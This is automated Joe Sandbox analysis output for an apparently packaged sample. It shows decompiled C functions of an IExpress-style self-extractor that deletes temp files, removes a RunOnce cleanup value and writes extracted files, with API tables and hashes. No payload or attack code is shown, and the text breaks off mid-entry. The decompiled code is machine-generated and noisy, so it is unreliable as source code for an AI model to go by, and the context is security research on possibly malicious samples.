                            0x0094529e
                            0x00945279
                            0x00000000
                            0x0094527b
                            0x00945273
                            0x00000000
                            0x00945273
                            0x0094524a
                            0x00945250
                            0x00945256
                            0x00000000
                            0x00945256
                            0x00945219
                            0x00945223
                            0x00000000

                            APIs
                              • Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446A0
                              • Part of subcall function 0094468F: SizeofResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446A9
                              • Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446C3
                              • Part of subcall function 0094468F: LoadResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446CC
                              • Part of subcall function 0094468F: LockResource.KERNEL32(00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446D3
                              • Part of subcall function 0094468F: memcpy_s.MSVCRT ref: 009446E5
                              • Part of subcall function 0094468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009446EF
                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00942F4D,?,00000002,00000000), ref: 00945201
                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00945250
                              • Part of subcall function 009444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00944518
                              • Part of subcall function 009444B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00944554
                              • Part of subcall function 00946285: GetLastError.KERNEL32(00945BBC), ref: 00946285
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                            • String ID: <None>$UPROMPT
                            • API String ID: 957408736-2980973527
                            • Opcode ID: 99e039a39f226cfc417e6af5ba935afaee703df040dab9354bf871787a61f18a
                            • Instruction ID: 38d2061d7f3de5a818e4c575835953313910f7dd6a1576c8db3b5e70c7ab2204
                            • Opcode Fuzzy Hash: 99e039a39f226cfc417e6af5ba935afaee703df040dab9354bf871787a61f18a
                            • Instruction Fuzzy Hash: 691127B9259201BFE3246FF15C49F3B62DDDBCA384F11442EF612E6192EABC8C006135
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 74%
                            			E009452B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                            				signed int _v8;
                            				char _v268;
                            				signed int _t9;
                            				signed int _t11;
                            				void* _t21;
                            				void* _t29;
                            				CHAR** _t31;
                            				void* _t32;
                            				signed int _t33;
                            
                            				_t28 = __edi;
                            				_t22 = __ecx;
                            				_t21 = __ebx;
                            				_t9 =  *0x948004; // 0xec518a5e
                            				_v8 = _t9 ^ _t33;
                            				_push(__esi);
                            				_t31 =  *0x9491e0; // 0x3087c30
                            				if(_t31 != 0) {
                            					_push(__edi);
                            					do {
                            						_t29 = _t31;
                            						if( *0x948a24 == 0 &&  *0x949a30 == 0) {
                            							SetFileAttributesA( *_t31, 0x80); // executed
                            							DeleteFileA( *_t31); // executed
                            						}
                            						_t31 = _t31[1];
                            						LocalFree( *_t29);
                            						LocalFree(_t29);
                            					} while (_t31 != 0);
                            					_pop(_t28);
                            				}
                            				_t11 =  *0x948a20; // 0x0
                            				_pop(_t32);
                            				if(_t11 != 0 &&  *0x948a24 == 0 &&  *0x949a30 == 0) {
                            					_push(_t22);
                            					E00941781( &_v268, 0x104, _t22, "C:\Users\engineer\AppData\Local\Temp\IXP001.TMP\");
                            					if(( *0x949a34 & 0x00000020) != 0) {
                            						E009465E8( &_v268);
                            					}
                            					SetCurrentDirectoryA(".."); // executed
                            					_t22 =  &_v268;
                            					E00942390( &_v268);
                            					_t11 =  *0x948a20; // 0x0
                            				}
                            				if( *0x949a40 != 1 && _t11 != 0) {
                            					_t11 = E00941FE1(_t22); // executed
                            				}
                            				 *0x948a20 =  *0x948a20 & 0x00000000;
                            				return E00946CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                            			}












                            0x009452b6
                            0x009452b6
                            0x009452b6
                            0x009452c1
                            0x009452c8
                            0x009452cb
                            0x009452cc
                            0x009452d4
                            0x009452d6
                            0x009452d7
                            0x009452de
                            0x009452e0
                            0x009452f2
                            0x009452fa
                            0x009452fa
                            0x00945302
                            0x00945305
                            0x0094530c
                            0x00945312
                            0x00945316
                            0x00945316
                            0x00945317
                            0x0094531c
                            0x0094531f
                            0x00945333
                            0x00945345
                            0x00945351
                            0x00945359
                            0x00945359
                            0x00945363
                            0x00945369
                            0x0094536f
                            0x00945374
                            0x00945374
                            0x00945381
                            0x00945387
                            0x00945387
                            0x0094538f
                            0x009453a0

                            APIs
                            • SetFileAttributesA.KERNELBASE(03087C30,00000080,?,00000000), ref: 009452F2
                            • DeleteFileA.KERNELBASE(03087C30), ref: 009452FA
                            • LocalFree.KERNEL32(03087C30,?,00000000), ref: 00945305
                            • LocalFree.KERNEL32(03087C30), ref: 0094530C
                            • SetCurrentDirectoryA.KERNELBASE(009411FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00945363
                            Strings
                            • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00945334
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                            • API String ID: 2833751637-3699071305
                            • Opcode ID: 990bfc51ef4dcc3b356b8d001e8f99fe8d2a9d81af48b97985f949bc099933b3
                            • Instruction ID: a0ac406fb510b9675a1d8a52de715155d62c34f74af8db34af83790c1f18f2f7
                            • Opcode Fuzzy Hash: 990bfc51ef4dcc3b356b8d001e8f99fe8d2a9d81af48b97985f949bc099933b3
                            • Instruction Fuzzy Hash: 0921C039528604DBDB30AF60ED09F6E77B8BB56798F050159E882526A2DFF05C88EB41
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00941FE1(void* __ecx) {
                            				void* _v8;
                            				long _t4;
                            
                            				if( *0x948530 != 0) {
                            					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                            					if(_t4 == 0) {
                            						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
                            						return RegCloseKey(_v8);
                            					}
                            				}
                            				return _t4;
                            			}





                            0x00941fee
                            0x00942005
                            0x0094200d
                            0x00942017
                            0x00000000
                            0x00942020
                            0x0094200d
                            0x00942029

                            APIs
                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0094538C,?,?,0094538C), ref: 00942005
                            • RegDeleteValueA.KERNELBASE(0094538C,wextract_cleanup1,?,?,0094538C), ref: 00942017
                            • RegCloseKey.ADVAPI32(0094538C,?,?,0094538C), ref: 00942020
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: CloseDeleteOpenValue
                            • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                            • API String ID: 849931509-1592051331
                            • Opcode ID: 00b4d3af6e60ba398937cf31b685540c05a3e7931eacecae5b573868d6cd52f2
                            • Instruction ID: 791e102518baf5c6e238f04325056f0a69d8ffd3ceb562aade572dc62d87f18f
                            • Opcode Fuzzy Hash: 00b4d3af6e60ba398937cf31b685540c05a3e7931eacecae5b573868d6cd52f2
                            • Instruction Fuzzy Hash: A1E04F345A8318BBE7219B90EC0AF5E7B6DF742744F100194F904A0061EB615E14E715
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E00944CD0(char* __edx, long _a4, int _a8) {
                            				signed int _v8;
                            				char _v268;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t29;
                            				int _t30;
                            				long _t32;
                            				signed int _t33;
                            				long _t35;
                            				long _t36;
                            				struct HWND__* _t37;
                            				long _t38;
                            				long _t39;
                            				long _t41;
                            				long _t44;
                            				long _t45;
                            				long _t46;
                            				signed int _t50;
                            				long _t51;
                            				char* _t58;
                            				long _t59;
                            				char* _t63;
                            				long _t64;
                            				CHAR* _t71;
                            				CHAR* _t74;
                            				int _t75;
                            				signed int _t76;
                            
                            				_t69 = __edx;
                            				_t29 =  *0x948004; // 0xec518a5e
                            				_t30 = _t29 ^ _t76;
                            				_v8 = _t30;
                            				_t75 = _a8;
                            				if( *0x9491d8 == 0) {
                            					_t32 = _a4;
                            					__eflags = _t32;
                            					if(_t32 == 0) {
                            						_t33 = E00944E99(_t75);
                            						L35:
                            						return E00946CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                            					}
                            					_t35 = _t32 - 1;
                            					__eflags = _t35;
                            					if(_t35 == 0) {
                            						L9:
                            						_t33 = 0;
                            						goto L35;
                            					}
                            					_t36 = _t35 - 1;
                            					__eflags = _t36;
                            					if(_t36 == 0) {
                            						_t37 =  *0x948584; // 0x0
                            						__eflags = _t37;
                            						if(_t37 != 0) {
                            							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                            						}
                            						_t54 = 0x9491e4;
                            						_t58 = 0x9491e4;
                            						do {
                            							_t38 =  *_t58;
                            							_t58 =  &(_t58[1]);
                            							__eflags = _t38;
                            						} while (_t38 != 0);
                            						_t59 = _t58 - 0x9491e5;
                            						__eflags = _t59;
                            						_t71 =  *(_t75 + 4);
                            						_t73 =  &(_t71[1]);
                            						do {
                            							_t39 =  *_t71;
                            							_t71 =  &(_t71[1]);
                            							__eflags = _t39;
                            						} while (_t39 != 0);
                            						_t69 = _t71 - _t73;
                            						_t30 = _t59 + 1 + _t71 - _t73;
                            						__eflags = _t30 - 0x104;
                            						if(_t30 >= 0x104) {
                            							L3:
                            							_t33 = _t30 | 0xffffffff;
                            							goto L35;
                            						}
                            						_t69 = 0x9491e4;
                            						_t30 = E00944702( &_v268, 0x9491e4,  *(_t75 + 4));
                            						__eflags = _t30;
                            						if(__eflags == 0) {
                            							goto L3;
                            						}
                            						_t41 = E0094476D( &_v268, __eflags);
                            						__eflags = _t41;
                            						if(_t41 == 0) {
                            							goto L9;
                            						}
                            						_push(0x180);
                            						_t30 = E00944980( &_v268, 0x8302); // executed
                            						_t75 = _t30;
                            						__eflags = _t75 - 0xffffffff;
                            						if(_t75 == 0xffffffff) {
                            							goto L3;
                            						}
                            						_t30 = E009447E0( &_v268);
                            						__eflags = _t30;
                            						if(_t30 == 0) {
                            							goto L3;
                            						}
                            						 *0x9493f4 =  *0x9493f4 + 1;
                            						_t33 = _t75;
                            						goto L35;
                            					}
                            					_t44 = _t36 - 1;
                            					__eflags = _t44;
                            					if(_t44 == 0) {
                            						_t54 = 0x9491e4;
                            						_t63 = 0x9491e4;
                            						do {
                            							_t45 =  *_t63;
                            							_t63 =  &(_t63[1]);
                            							__eflags = _t45;
                            						} while (_t45 != 0);
                            						_t74 =  *(_t75 + 4);
                            						_t64 = _t63 - 0x9491e5;
                            						__eflags = _t64;
                            						_t69 =  &(_t74[1]);
                            						do {
                            							_t46 =  *_t74;
                            							_t74 =  &(_t74[1]);
                            							__eflags = _t46;
                            						} while (_t46 != 0);
                            						_t73 = _t74 - _t69;
                            						_t30 = _t64 + 1 + _t74 - _t69;
                            						__eflags = _t30 - 0x104;
                            						if(_t30 >= 0x104) {
                            							goto L3;
                            						}
                            						_t69 = 0x9491e4;
                            						_t30 = E00944702( &_v268, 0x9491e4,  *(_t75 + 4));
                            						__eflags = _t30;
                            						if(_t30 == 0) {
                            							goto L3;
                            						}
                            						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                            						_t30 = E00944C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                            						__eflags = _t30;
                            						if(_t30 == 0) {
                            							goto L3;
                            						}
                            						E00944B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                            						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                            						__eflags = _t50;
                            						if(_t50 != 0) {
                            							_t51 = _t50 & 0x00000027;
                            							__eflags = _t51;
                            						} else {
                            							_t51 = 0x80;
                            						}
                            						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                            						__eflags = _t30;
                            						if(_t30 == 0) {
                            							goto L3;
                            						} else {
                            							_t33 = 1;
                            							goto L35;
                            						}
                            					}
                            					_t30 = _t44 - 1;
                            					__eflags = _t30;
                            					if(_t30 == 0) {
                            						goto L3;
                            					}
                            					goto L9;
                            				}
                            				if(_a4 == 3) {
                            					_t30 = E00944B60( *((intOrPtr*)(_t75 + 0x14)));
                            				}
                            				goto L3;
                            			}































                            0x00944cd0
                            0x00944cdb
                            0x00944ce0
                            0x00944ce2
                            0x00944cee
                            0x00944cf2
                            0x00944d0e
                            0x00944d0e
                            0x00944d11
                            0x00944e83
                            0x00944e88
                            0x00944e98
                            0x00944e98
                            0x00944d17
                            0x00944d17
                            0x00944d1a
                            0x00944d2f
                            0x00944d2f
                            0x00000000
                            0x00944d2f
                            0x00944d1c
                            0x00944d1c
                            0x00944d1f
                            0x00944dcb
                            0x00944dd0
                            0x00944dd2
                            0x00944ddd
                            0x00944ddd
                            0x00944de3
                            0x00944de8
                            0x00944ded
                            0x00944ded
                            0x00944def
                            0x00944df0
                            0x00944df0
                            0x00944df4
                            0x00944df4
                            0x00944df6
                            0x00944df9
                            0x00944dfc
                            0x00944dfc
                            0x00944dfe
                            0x00944dff
                            0x00944dff
                            0x00944e03
                            0x00944e08
                            0x00944e0a
                            0x00944e0f
                            0x00944d03
                            0x00944d03
                            0x00000000
                            0x00944d03
                            0x00944e18
                            0x00944e20
                            0x00944e25
                            0x00944e27
                            0x00000000
                            0x00000000
                            0x00944e33
                            0x00944e38
                            0x00944e3a
                            0x00000000
                            0x00000000
                            0x00944e40
                            0x00944e51
                            0x00944e56
                            0x00944e5b
                            0x00944e5e
                            0x00000000
                            0x00000000
                            0x00944e6a
                            0x00944e6f
                            0x00944e71
                            0x00000000
                            0x00000000
                            0x00944e77
                            0x00944e7d
                            0x00000000
                            0x00944e7d
                            0x00944d25
                            0x00944d25
                            0x00944d28
                            0x00944d36
                            0x00944d3b
                            0x00944d40
                            0x00944d40
                            0x00944d42
                            0x00944d43
                            0x00944d43
                            0x00944d47
                            0x00944d4a
                            0x00944d4a
                            0x00944d4c
                            0x00944d4f
                            0x00944d4f
                            0x00944d51
                            0x00944d52
                            0x00944d52
                            0x00944d56
                            0x00944d5b
                            0x00944d5d
                            0x00944d62
                            0x00000000
                            0x00000000
                            0x00944d67
                            0x00944d6f
                            0x00944d74
                            0x00944d76
                            0x00000000
                            0x00000000
                            0x00944d7c
                            0x00944d84
                            0x00944d89
                            0x00944d8b
                            0x00000000
                            0x00000000
                            0x00944d94
                            0x00944d99
                            0x00944d9e
                            0x00944da1
                            0x00944daa
                            0x00944daa
                            0x00944da3
                            0x00944da3
                            0x00944da3
                            0x00944db5
                            0x00944dbb
                            0x00944dbd
                            0x00000000
                            0x00944dc3
                            0x00944dc5
                            0x00000000
                            0x00944dc5
                            0x00944dbd
                            0x00944d2a
                            0x00944d2a
                            0x00944d2d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00944d2d
                            0x00944cf8
                            0x00944cfd
                            0x00944d02
                            0x00000000

                            APIs
                            • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00944DB5
                            • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00944DDD
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: AttributesFileItemText
                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                            • API String ID: 3625706803-3699071305
                            • Opcode ID: 5d0a8f8f358648dbb64209643ed3a210514c73f9e7c679efbd6c7a5c1709e329
                            • Instruction ID: 529c01b0945e004e5e9614a83295f75dbb6f44804ba8755b0ef54e14abb2f220
                            • Opcode Fuzzy Hash: 5d0a8f8f358648dbb64209643ed3a210514c73f9e7c679efbd6c7a5c1709e329
                            • Instruction Fuzzy Hash: 8F412436A046019BCF259F38DD44FFA73A9EB86308F144668E882972C5DE31FE4AC750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00944C37(signed int __ecx, int __edx, int _a4) {
                            				struct _FILETIME _v12;
                            				struct _FILETIME _v20;
                            				FILETIME* _t14;
                            				int _t15;
                            				signed int _t21;
                            
                            				_t21 = __ecx * 0x18;
                            				if( *((intOrPtr*)(_t21 + 0x948d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                            					L5:
                            					return 0;
                            				} else {
                            					_t14 =  &_v12;
                            					_t15 = SetFileTime( *(_t21 + 0x948d74), _t14, _t14, _t14); // executed
                            					if(_t15 == 0) {
                            						goto L5;
                            					}
                            					return 1;
                            				}
                            			}








                            0x00944c40
                            0x00944c4a
                            0x00944c8d
                            0x00000000
                            0x00944c70
                            0x00944c70
                            0x00944c7e
                            0x00944c86
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00944c8a

                            APIs
                            • DosDateTimeToFileTime.KERNEL32 ref: 00944C54
                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00944C66
                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 00944C7E
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Time$File$DateLocal
                            • String ID:
                            • API String ID: 2071732420-0
                            • Opcode ID: 1cbdfa8ebeb3e3a3ac2abd58f43ef7921cc75eaf61d8e2adcaf8fd1e72b3b043
                            • Instruction ID: b05fb8ffb0aefdded6ea34ac3b5276a5c02fb3bf6363d2ea5f2d1fcadb1834c2
                            • Opcode Fuzzy Hash: 1cbdfa8ebeb3e3a3ac2abd58f43ef7921cc75eaf61d8e2adcaf8fd1e72b3b043
                            • Instruction Fuzzy Hash: BFF0B476A1520CAF9B24DFB4CC88EFB77ADEB09342B48052BE855C1050FA30D914D7A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E0094487A(CHAR* __ecx, signed int __edx) {
                            				void* _t7;
                            				CHAR* _t11;
                            				long _t18;
                            				long _t23;
                            
                            				_t11 = __ecx;
                            				asm("sbb edi, edi");
                            				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                            				if((__edx & 0x00000100) == 0) {
                            					asm("sbb esi, esi");
                            					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                            				} else {
                            					if((__edx & 0x00000400) == 0) {
                            						asm("sbb esi, esi");
                            						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                            					} else {
                            						_t23 = 1;
                            					}
                            				}
                            				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                            				if(_t7 != 0xffffffff || _t23 == 3) {
                            					return _t7;
                            				} else {
                            					E0094490C(_t11);
                            					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                            				}
                            			}







                            0x00944880
                            0x0094488c
                            0x00944894
                            0x009448a0
                            0x009448c9
                            0x009448ce
                            0x009448a2
                            0x009448a8
                            0x009448b7
                            0x009448bc
                            0x009448aa
                            0x009448ac
                            0x009448ac
                            0x009448a8
                            0x009448de
                            0x009448e7
                            0x0094490b
                            0x009448ee
                            0x009448f0
                            0x00000000
                            0x00944902

                            APIs
                            • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00944A23,?,00944F67,*MEMCAB,00008000,00000180), ref: 009448DE
                            • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00944F67,*MEMCAB,00008000,00000180), ref: 00944902
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: b1dfe9c8200cefd6baf5f40415348ed61b2d5b324ad8829faa62f70302ad2fcf
                            • Instruction ID: 8bb97fe877f385c77cf6eaec1d5a4d2c311eb1984dfbad4e8360327a43555c1f
                            • Opcode Fuzzy Hash: b1dfe9c8200cefd6baf5f40415348ed61b2d5b324ad8829faa62f70302ad2fcf
                            • Instruction Fuzzy Hash: F4016DA3E2A57026F32440294C88FB7551CCBDAB39F1B0734BDEAE72D2D5644C0491E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E00944AD0(signed int _a4, void* _a8, long _a12) {
                            				signed int _t9;
                            				int _t12;
                            				signed int _t14;
                            				signed int _t15;
                            				void* _t20;
                            				struct HWND__* _t21;
                            				signed int _t24;
                            				signed int _t25;
                            
                            				_t20 =  *0x94858c; // 0x270
                            				_t9 = E00943680(_t20);
                            				if( *0x9491d8 == 0) {
                            					_push(_t24);
                            					_t12 = WriteFile( *(0x948d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                            					if(_t12 != 0) {
                            						_t25 = _a12;
                            						if(_t25 != 0xffffffff) {
                            							_t14 =  *0x949400; // 0x40200
                            							_t15 = _t14 + _t25;
                            							 *0x949400 = _t15;
                            							if( *0x948184 != 0) {
                            								_t21 =  *0x948584; // 0x0
                            								if(_t21 != 0) {
                            									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x9493f8, 0);
                            								}
                            							}
                            						}
                            					} else {
                            						_t25 = _t24 | 0xffffffff;
                            					}
                            					return _t25;
                            				} else {
                            					return _t9 | 0xffffffff;
                            				}
                            			}











                            0x00944ad5
                            0x00944adb
                            0x00944ae7
                            0x00944aee
                            0x00944b05
                            0x00944b0d
                            0x00944b14
                            0x00944b1a
                            0x00944b1c
                            0x00944b21
                            0x00944b2a
                            0x00944b2f
                            0x00944b31
                            0x00944b39
                            0x00944b54
                            0x00944b54
                            0x00944b39
                            0x00944b2f
                            0x00944b0f
                            0x00944b0f
                            0x00944b0f
                            0x00944b5e
                            0x00944ae9
                            0x00944aed
                            0x00944aed

                            APIs
                              • Part of subcall function 00943680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0094369F
                              • Part of subcall function 00943680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009436B2
                              • Part of subcall function 00943680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009436DA
                            • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00944B05
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                            • String ID:
                            • API String ID: 1084409-0
                            • Opcode ID: e3832b9dad793dec9afa605123bd1480de6a8b5e85f85609d8056763c472c52f
                            • Instruction ID: 5338d73a9b713d315fc2544a0a018cf12084d778439c123a0ab49529340e168f
                            • Opcode Fuzzy Hash: e3832b9dad793dec9afa605123bd1480de6a8b5e85f85609d8056763c472c52f
                            • Instruction Fuzzy Hash: 5101B535255201ABD7188F68DC05FAB775DF746729F148225F939971F0CB70D812DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0094658A(char* __ecx, void* __edx, char* _a4) {
                            				intOrPtr _t4;
                            				char* _t6;
                            				char* _t8;
                            				void* _t10;
                            				void* _t12;
                            				char* _t16;
                            				intOrPtr* _t17;
                            				void* _t18;
                            				char* _t19;
                            
                            				_t16 = __ecx;
                            				_t10 = __edx;
                            				_t17 = __ecx;
                            				_t1 = _t17 + 1; // 0x948b3f
                            				_t12 = _t1;
                            				do {
                            					_t4 =  *_t17;
                            					_t17 = _t17 + 1;
                            				} while (_t4 != 0);
                            				_t18 = _t17 - _t12;
                            				_t2 = _t18 + 1; // 0x948b40
                            				if(_t2 < __edx) {
                            					_t19 = _t18 + __ecx;
                            					if(_t19 > __ecx) {
                            						_t8 = CharPrevA(__ecx, _t19); // executed
                            						if( *_t8 != 0x5c) {
                            							 *_t19 = 0x5c;
                            							_t19 =  &(_t19[1]);
                            						}
                            					}
                            					_t6 = _a4;
                            					 *_t19 = 0;
                            					while( *_t6 == 0x20) {
                            						_t6 = _t6 + 1;
                            					}
                            					return E009416B3(_t16, _t10, _t6);
                            				}
                            				return 0x8007007a;
                            			}












                            0x00946592
                            0x00946594
                            0x00946596
                            0x00946598
                            0x00946598
                            0x0094659b
                            0x0094659b
                            0x0094659d
                            0x0094659e
                            0x009465a2
                            0x009465a4
                            0x009465a9
                            0x009465b2
                            0x009465b6
                            0x009465ba
                            0x009465c3
                            0x009465c5
                            0x009465c8
                            0x009465c8
                            0x009465c3
                            0x009465c9
                            0x009465cc
                            0x009465d2
                            0x009465d1
                            0x009465d1
                            0x00000000
                            0x009465dc
                            0x00000000

                            APIs
                            • CharPrevA.USER32(00948B3E,00948B3F,00000001,00948B3E,-00000003,?,009460EC,00941140,?), ref: 009465BA
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
